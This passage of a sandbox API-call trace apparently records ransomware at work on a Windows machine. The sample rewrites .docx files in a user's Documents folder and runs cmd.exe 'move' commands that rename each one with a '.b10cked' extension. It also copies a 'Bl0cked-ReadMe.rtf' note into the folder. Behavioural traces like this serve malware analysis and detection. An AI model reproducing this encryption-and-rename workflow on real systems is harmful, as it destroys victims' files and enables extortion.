SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1c6b [0134.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.900] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x1783 [0134.900] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0134.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0134.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0134.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x1c6b [0134.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0134.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0134.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0134.901] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x1c6b [0134.902] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0134.902] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0134.902] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0xe34, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0xe34, lpOverlapped=0x0) returned 1 [0134.902] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0134.902] WriteFile (in: hFile=0x114, lpBuffer=0x127cb28*, nNumberOfBytesToWrite=0xe34, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x127cb28*, lpNumberOfBytesWritten=0x12ec1c*=0xe34, lpOverlapped=0x0) returned 1 [0134.902] SetFilePointer (in: hFile=0x114, lDistanceToMove=-3636, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xe37 [0134.902] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0xe34, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0xe34, lpOverlapped=0x0) returned 1 [0134.902] SetFilePointer (in: hFile=0x114, lDistanceToMove=-3636, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xe37 [0134.902] WriteFile (in: hFile=0x114, lpBuffer=0x127cb28*, nNumberOfBytesToWrite=0xe34, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x127cb28*, lpNumberOfBytesWritten=0x12ec1c*=0xe34, lpOverlapped=0x0) returned 1 [0134.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="-V83XFbt5-FsW.docx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0134.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="-V83XFbt5-FsW.docx", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, 
lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-V83XFbt5-FsW.docx", lpUsedDefaultChar=0x0) returned 18 [0134.907] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x1c6b [0134.907] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0134.908] CloseHandle (hObject=0x114) returned 1 [0134.908] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\-V83XFbt5-FsW.docx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC") returned 0x26 [0134.909] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0134.909] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xbc4, dwThreadId=0xb8c)) returned 1 [0134.911] CloseHandle (hObject=0x110) 
returned 1 [0134.911] CloseHandle (hObject=0x114) returned 1 [0134.911] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0134.911] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\ftTfHtfADyQIa-_\\", cchLength=0x2e | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\") returned 0x2e [0134.911] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\GBKI\\FTTFHTFADYQIA-_\\", cchCount2=46) returned 3 [0134.911] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0134.911] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0134.911] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0134.911] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0134.911] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0134.912] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0134.912] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0134.912] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 
0x42 [0134.912] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0134.912] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xb88, dwThreadId=0xbb4)) returned 1 [0134.913] CloseHandle (hObject=0x110) returned 1 [0134.913] CloseHandle (hObject=0x114) returned 1 [0134.913] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf")) returned 0x20 [0134.914] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0134.914] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0134.914] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0134.914] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] ReleaseMutex (hMutex=0xf8) returned 1 [0134.914] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] ReleaseMutex (hMutex=0xf8) returned 1 [0134.914] 
WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] ReleaseMutex (hMutex=0xf8) returned 1 [0134.914] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0134.914] ReleaseMutex (hMutex=0xf8) returned 1 [0134.914] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2VgMmRhPzB7.docx" (normalized: "c:\\users\\eebsym5\\documents\\2vgmmrhpzb7.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0134.914] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.914] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.914] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.914] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19170372100) returned 1 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3370 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.915] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3370 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0134.916] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2e88 [0134.916] ReadFile (in: 
hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0134.917] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0134.917] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0134.917] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3370 [0134.917] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0134.917] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0134.918] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0134.918] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3370 [0134.918] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0134.918] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0134.918] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x19b7, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x19b7, lpOverlapped=0x0) returned 1 [0134.918] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0134.918] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x19b7, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x19b7, lpOverlapped=0x0) returned 1 [0134.918] SetFilePointer (in: hFile=0x114, lDistanceToMove=-6583, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x19b9 [0134.918] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x19b7, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x19b7, lpOverlapped=0x0) returned 1 [0134.918] SetFilePointer (in: hFile=0x114, lDistanceToMove=-6583, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x19b9 [0134.918] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x19b7, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x19b7, lpOverlapped=0x0) returned 1 [0134.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2VgMmRhPzB7.docx", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0134.940] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2VgMmRhPzB7.docx", cchWideChar=16, lpMultiByteStr=0x1328834, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="2VgMmRhPzB7.docx", lpUsedDefaultChar=0x0) returned 16 [0134.940] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3370 [0134.940] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, 
lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0134.941] CloseHandle (hObject=0x114) returned 1 [0134.941] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2VgMmRhPzB7.docx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC") returned 0x26 [0134.942] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0134.942] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VGMMR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2VgMmRhPzB7.docx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xc54, 